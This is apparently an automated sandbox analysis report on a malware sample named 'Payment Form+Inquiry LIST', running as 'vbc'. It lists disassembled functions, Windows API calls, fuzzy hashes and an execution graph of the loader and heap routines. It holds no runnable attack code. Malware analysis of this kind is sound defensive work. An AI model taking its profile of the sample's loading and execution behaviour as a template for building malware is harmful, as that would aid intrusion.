                            • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E8253141), ref: 00007FF6E825C914
                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E8253141), ref: 00007FF6E825C91E
                            • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E8253141), ref: 00007FF6E825C93D
                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E8253141), ref: 00007FF6E825C951
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ErrorLastMultipleWait$HandlesObjects
                            • String ID:
                            • API String ID: 2817213684-0
                            • Opcode ID: c37379b00bf82ea155403ded38e02c18f4784a01f515fd6f355ba75294a0392b
                            • Instruction ID: f4b547126e77214922fd4eae8f9f429e1d70b37e07028c5dee568d62a99123fc
                            • Opcode Fuzzy Hash: c37379b00bf82ea155403ded38e02c18f4784a01f515fd6f355ba75294a0392b
                            • Instruction Fuzzy Hash: ED115132708796C6DB245B75B50023AB261FB58B90F140139EADD97BD8DF3ED4408789
                            Function 00007FF6E82B26E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E82B19F3), ref: 00007FF6E82B2730
                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E82B19F3), ref: 00007FF6E82B2771
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3975dceb791f57bb3fcf29378d87f0c658d09fa8d7692f204abce351d6e993e4
                            • Instruction ID: 6b0984530e07b0f559ba72f968f3f5e144bdcf5ca375661b9d16b2ff27116a4d
                            • Opcode Fuzzy Hash: 3975dceb791f57bb3fcf29378d87f0c658d09fa8d7692f204abce351d6e993e4
                            • Instruction Fuzzy Hash: 42115B33A19B8086EB208F25E50036977E6FF88B94F184234DE9C47768DF3DC5518B08
                            Function 00007FF6E825E0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON
                            Download Yara Rule
                            APIs
                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF6E825D913,?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825E0EB
                            • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF6E825D913,?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825E128
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: _stricmpstrtoull
                            • String ID: HeapVerify
                            • API String ID: 4031153986-2674988305
                            • Opcode ID: 6676ef8255daf0935dec1f4c384c2b73da7f904fbf3830ba254776d158681313
                            • Instruction ID: bf92ad869fb29ed13efa765d1b1bd6333de4e8ed598fc0d9c7fb69e122afb1da
                            • Opcode Fuzzy Hash: 6676ef8255daf0935dec1f4c384c2b73da7f904fbf3830ba254776d158681313
                            • Instruction Fuzzy Hash: 41019236A09A41CAE714DF22E9801B9B360FB54790B589431DA8D93B19CE3ED581874E
                            Function 00007FF6E8275640 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6E82757BF,?,?,?,00007FF6E8282F8B), ref: 00007FF6E827568D
                            • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6E82757BF,?,?,?,00007FF6E8282F8B), ref: 00007FF6E82756E2
                            • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6E82757BF,?,?,?,00007FF6E8282F8B), ref: 00007FF6E82756FF
                            • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6E82757BF,?,?,?,00007FF6E8282F8B), ref: 00007FF6E827571C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 29070b862ed98ea1ac05cf7a7111bb372c5032687568700d2cf239e38bc29c80
                            • Instruction ID: 98f41a102402f8f9cb63446c2b04da38ab132d9349eec1149691419af28b3e3b
                            • Opcode Fuzzy Hash: 29070b862ed98ea1ac05cf7a7111bb372c5032687568700d2cf239e38bc29c80
                            • Instruction Fuzzy Hash: 6021BF23A1CA4AD6EA008F31AB503B963A4EF957E0F550234D96CC36D5CF2EE049834E

                            Execution Graph

                            Execution Coverage:1.4%
                            Dynamic/Decrypted Code Coverage:4.9%
                            Signature Coverage:9.2%
                            Total number of Nodes:142
                            Total number of Limit Nodes:10
                            execution_graph 78488 424743 78489 424752 78488->78489 78490 424799 78489->78490 78493 4247da 78489->78493 78495 4247df 78489->78495 78496 42d463 78490->78496 78494 42d463 RtlFreeHeap 78493->78494 78494->78495 78499 42b903 78496->78499 78498 4247a9 78500 42b920 78499->78500 78501 42b931 RtlFreeHeap 78500->78501 78501->78498 78502 42e543 78503 42e553 78502->78503 78504 42e559 78502->78504 78507 42d543 78504->78507 78506 42e57f 78510 42b8b3 78507->78510 78509 42d55e 78509->78506 78511 42b8d0 78510->78511 78512 42b8e1 RtlAllocateHeap 78511->78512 78512->78509 78513 42abc3 78514 42abdd 78513->78514 78517 51a2df0 LdrInitializeThunk 78514->78517 78515 42ac05 78517->78515 78637 4243b3 78638 4243cf 78637->78638 78639 4243f7 78638->78639 78640 42440b 78638->78640 78641 42b593 NtClose 78639->78641 78642 42b593 NtClose 78640->78642 78643 424400 78641->78643 78644 424414 78642->78644 78647 42d583 RtlAllocateHeap 78644->78647 78646 42441f 78647->78646 78518 41b083 78519 41b0c7 78518->78519 78520 41b0e8 78519->78520 78522 42b593 78519->78522 78523 42b5b0 78522->78523 78524 42b5c1 NtClose 78523->78524 78524->78520 78525 41e183 78526 41e1a9 78525->78526 78530 41e291 78526->78530 78531 42e673 78526->78531 78528 41e238 78528->78530 78537 42ac13 78528->78537 78532 42e5e3 78531->78532 78533 42d543 RtlAllocateHeap 78532->78533 78536 42e640 78532->78536 78534 42e61d 78533->78534 78535 42d463 RtlFreeHeap 78534->78535 78535->78536 78536->78528 78538 42ac30 78537->78538 78541 51a2c0a 78538->78541 78539 42ac5c 78539->78530 78542 51a2c1f LdrInitializeThunk 78541->78542 78543 51a2c11 78541->78543 78542->78539 78543->78539 78648 414093 78649 41409a 78648->78649 78654 417a33 78649->78654 78651 4140c8 78652 41410d 78651->78652 78653 4140fc PostThreadMessageW 78651->78653 78653->78652 78656 417a57 78654->78656 78655 417a5e 78655->78651 78656->78655 78658 417a7d 78656->78658 78661 42e923 LdrLoadDll 78656->78661 78659 417a93 LdrLoadDll 78658->78659 78660 417aaa 78658->78660 78659->78660 78660->78651 78661->78658 78544 401be9 78545 401bf0 78544->78545 78548 42ea03 78545->78548 78546 401c29 78546->78546 78551 42d053 78548->78551 78552 42d079 78551->78552 78563 407613 78552->78563 78554 42d08f 78555 42d0e0 78554->78555 78567 41ae93 78554->78567 78555->78546 78557 42d0ae 78558 42d0c3 78557->78558 78582 42b953 78557->78582 78578 427653 78558->78578 78561 42d0d2 78562 42b953 ExitProcess 78561->78562 78562->78555 78564 407614 78563->78564 78585 416763 78564->78585 78566 407620 78566->78554 78568 41aebf 78567->78568 78599 41ad83 78568->78599 78571 41af04 78574 41af20 78571->78574 78576 42b593 NtClose 78571->78576 78572 41aeec 78573 41aef7 78572->78573 78575 42b593 NtClose 78572->78575 78573->78557 78574->78557 78575->78573 78577 41af16 78576->78577 78577->78557 78579 4276ad 78578->78579 78580 4276ba 78579->78580 78610 418583 78579->78610 78580->78561 78583 42b970 78582->78583 78584 42b981 ExitProcess 78583->78584 78584->78558 78586 41677a 78585->78586 78588 4167a7 78586->78588 78590 416793 78586->78590 78598 42a503 RtlFreeHeap LdrInitializeThunk 78586->78598 78591 42bfe3 78588->78591 78590->78566 78592 42bffb 78591->78592 78593 42c01f 78592->78593 78594 42ac13 LdrInitializeThunk 78592->78594 78593->78590 78595 42c074 78594->78595 78596 42d463 RtlFreeHeap 78595->78596 78597 42c08d 78596->78597 78597->78590 78598->78588 78600 41ae79 78599->78600 78601 41ad9d 78599->78601 78600->78571 78600->78572 78605 42acb3 78601->78605 78604 42b593 NtClose 78604->78600 78606 42accd 78605->78606 78609 51a35c0 LdrInitializeThunk 78606->78609 78607 41ae6d 78607->78604 78609->78607 78611 4185ad 78610->78611 78617 418a1b 78611->78617 78618 4141b3 78611->78618 78613 4186ba 78614 42d463 RtlFreeHeap 78613->78614 78613->78617 78615 4186d2 78614->78615 78616 42b953 ExitProcess 78615->78616 78615->78617 78616->78617 78617->78580 78619 4141cf 78618->78619 78620 414323 78619->78620 78623 4142ef 78619->78623 78627 413c13 78619->78627 78620->78613 78622 414303 78622->78620 78631 41b1a3 RtlFreeHeap LdrInitializeThunk 78622->78631 78623->78620 78630 41b1a3 RtlFreeHeap LdrInitializeThunk 78623->78630 78625 414319 78625->78613 78632 42b813 78627->78632 78630->78622 78631->78625 78633 42b82d 78632->78633 78636 51a2c70 LdrInitializeThunk 78633->78636 78634 413c35 78634->78623 78636->78634 78662 418c38 78663 42b593 NtClose 78662->78663 78664 418c42 78663->78664 78665 51a2b60 LdrInitializeThunk

                            Executed Functions

                            Function 00417A33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 224 417a33-417a5c call 42e163 227 417a62-417a70 call 42e683 224->227 228 417a5e-417a61 224->228 231 417a80-417a91 call 42cb23 227->231 232 417a72-417a7d call 42e923 227->232 238 417a93-417aa7 LdrLoadDll 231->238 239 417aaa-417aad 231->239 232->231 238->239
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                            • Instruction ID: a14b4ffdb5fe0ebae34abb196159bdaefeaa327230b00d9eb3ec642f8eb76095
                            • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                            • Instruction Fuzzy Hash: 940112B5E4010DBBDF10DAA5DC42FDEB7789F54304F004196E90897241F635EB548755
                            Function 0042B593 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 245 42b593-42b5cf call 4049a3 call 42c643 NtClose
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                            • Instruction ID: 1573654a4f4f23356e70bd42089c4cb39e63ab89980323d43f3de8af3be88636
                            • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                            • Instruction Fuzzy Hash: 6BE04676204254BBC220AA6AEC41F9F776DDFC5724F00442AFA08A7282C6B5BA1186E5
                            Function 051A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 03a4c67ca9b9826c9182a7b4ff12bc54aa7db0860129f46eeaafe2bd98463049
                            • Instruction ID: b384b597af71759a2400a3fa77ca364b6e84dcbbf883e7d41946f77199ffa98e
                            • Opcode Fuzzy Hash: 03a4c67ca9b9826c9182a7b4ff12bc54aa7db0860129f46eeaafe2bd98463049
                            • Instruction Fuzzy Hash: BE90027260550412E10071684A54746101987D0601FA5C411E0426568D87D98A5169A2
                            Function 051A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: da9bcb7e6b47ad1fed8c0ca27ae92c1b74921715fd6bb95eb78776209b584e22
                            • Instruction ID: 227aa9d653d05965f7728cb21c711d98f59d515bbd5bcf57b6506492299df952
                            • Opcode Fuzzy Hash: da9bcb7e6b47ad1fed8c0ca27ae92c1b74921715fd6bb95eb78776209b584e22
                            • Instruction Fuzzy Hash: 2190027220140423E11171684A44747001D87D0641FD5C412E0426558D979A8A52A521
                            Function 051A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e9749ce2f547f5695094cd84470d6ff5ecc3bf4350c824892afb3bb8738be464
                            • Instruction ID: edb7744deb43f60ae201a96a029279f15050822d388d1dc3e36c871c4be440ee
                            • Opcode Fuzzy Hash: e9749ce2f547f5695094cd84470d6ff5ecc3bf4350c824892afb3bb8738be464
                            • Instruction Fuzzy Hash: F490027220148812E1107168894478A001987D0701F99C411E4426658D87D989917521
                            Function 051A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4ca82e71cbcc972d5b167436532628a1b42114d2d6ddb42b35487fbdea6d7843
                            • Instruction ID: 211bb8d955e79c223082fd7692a4b0e5ded6c7c02c11a8713f2d8021a915b2c1
                            • Opcode Fuzzy Hash: 4ca82e71cbcc972d5b167436532628a1b42114d2d6ddb42b35487fbdea6d7843
                            • Instruction Fuzzy Hash: DA9002A220240013510571684954656401E87E0601B95C021E1016590DC66989916525
                            Function 0041401A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 9c137fe075127a70db5381a908e253cb779df88f74039d614837a5d3f9b81308
                            • Instruction ID: e9a8c8687aaeafff36046211043bea6d8f886e60d9afbd7522c3a782f38ba3bd
                            • Opcode Fuzzy Hash: 9c137fe075127a70db5381a908e253cb779df88f74039d614837a5d3f9b81308
                            • Instruction Fuzzy Hash: A1118973904158BBDB029B749C46DEFFF7CEF81350B0480AEFA5467142D6394E4287A5
                            Function 00414059 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 34911ca6fa78662a9a750860d5d86970cb422ce9c6129bf029718bd3649f74d8
                            • Instruction ID: d6e4ff19b95466e9fe5a75fee5ad12c3f5ada0eb833e20bbb35db8e367bde451
                            • Opcode Fuzzy Hash: 34911ca6fa78662a9a750860d5d86970cb422ce9c6129bf029718bd3649f74d8
                            • Instruction Fuzzy Hash: 6E0166B2D0010C7ADB109FE19C82EEFAB7CDF84798F40802AFA04B7241D2784F4687A5
                            Function 0041408B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: c91aaa8decee38f3a30e2a95e9d8b0a291183a2d72e685fc848b434c8b6d8a09
                            • Instruction ID: cf9192664244b9ac975f5907ec0277faeb991ed911cf0314b90d64a2ad3432a1
                            • Opcode Fuzzy Hash: c91aaa8decee38f3a30e2a95e9d8b0a291183a2d72e685fc848b434c8b6d8a09
                            • Instruction Fuzzy Hash: 9011E5B2D0411C7EEB119FA19C82DEFBB7CDF417A8F008069FA04A7141D6794F0687A5
                            Function 00414093 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 5772162eecc2fe24cd4613575fecf9fb22c6b493dc5cb581e736842785e4031c
                            • Instruction ID: 3a752632b7030014dc9c9c30b5bcc15c88147ef53de421226a9d1532deb992d1
                            • Opcode Fuzzy Hash: 5772162eecc2fe24cd4613575fecf9fb22c6b493dc5cb581e736842785e4031c
                            • Instruction Fuzzy Hash: D901C4B2D0021C7AEB11AFE19C82DEFBB7CDF41798F408069FA14A7241D6794F0647A5
                            Function 0042B903 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 71 42b903-42b947 call 4049a3 call 42c643 RtlFreeHeap
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B942
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: gA
                            • API String ID: 3298025750-3478526202
                            • Opcode ID: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                            • Instruction ID: fe3716f387f97a3cfac574e56e7d4e73213d1ab919c33c628ae6fa0e6f0a2ede
                            • Opcode Fuzzy Hash: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                            • Instruction Fuzzy Hash: A9E06DB12043047BC620EE59EC45F9B73ACEFC5714F000029FA08A7241C671BA108AF9
                            Function 00417AB3 Relevance: 1.6, APIs: 1, Instructions: 104libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 203 417ab3-417abf 204 417ac1-417acf 203->204 205 417a8f-417a91 203->205 208 417ad1-417ad5 204->208 209 417a64-417a65 204->209 206 417a93-417aa7 LdrLoadDll 205->206 207 417aaa-417aad 205->207 206->207 212 417ad7-417b09 208->212 213 417b2a 208->213 210 417a6b-417a70 209->210 211 417a66 call 42e683 209->211 214 417a80-417a8c call 42cb23 210->214 215 417a72-417a7d call 42e923 210->215 211->210 216 417b67-417b91 213->216 217 417b2c-417b2d 213->217 214->205 215->214
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                            • Instruction ID: 6c43b7506f89a022c64d044e6c1ccbca58ffe011e8d6516ae037575ea145fc98
                            • Opcode Fuzzy Hash: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                            • Instruction Fuzzy Hash: 8C219D73A4810A6BDB01D998DC82ADEBB68EF41748F14415AE805DB343EB35EA06C7E5
                            Function 0042B8B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 240 42b8b3-42b8f7 call 4049a3 call 42c643 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(?,0041E238,?,?,00000000,?,0041E238,?,?,?), ref: 0042B8F2
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                            • Instruction ID: d9b541be78cc90539b36e3aa14f4a365451e7fb9285a10e02975410261364557
                            • Opcode Fuzzy Hash: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                            • Instruction Fuzzy Hash: DAE06DB62042047FD620EF59EC45E9B73ACEFC9714F004419F908A7241D671B9108AB9
                            Function 0042B953 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 250 42b953-42b98f call 4049a3 call 42c643 ExitProcess
                            APIs
                            • ExitProcess.KERNEL32(?,00000000,?,?,0FADE886,?,?,0FADE886), ref: 0042B98A
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                            • Instruction ID: c24f298f8ce9a33bcb8732fbd3dc6627db416b18a23357072eb898eabaee20fe
                            • Opcode Fuzzy Hash: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                            • Instruction Fuzzy Hash: 5BE04F756012147BD620AB5AEC41F9B775CDBC5714F40406AFA08A7145C6747A1187F5
                            Function 051A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
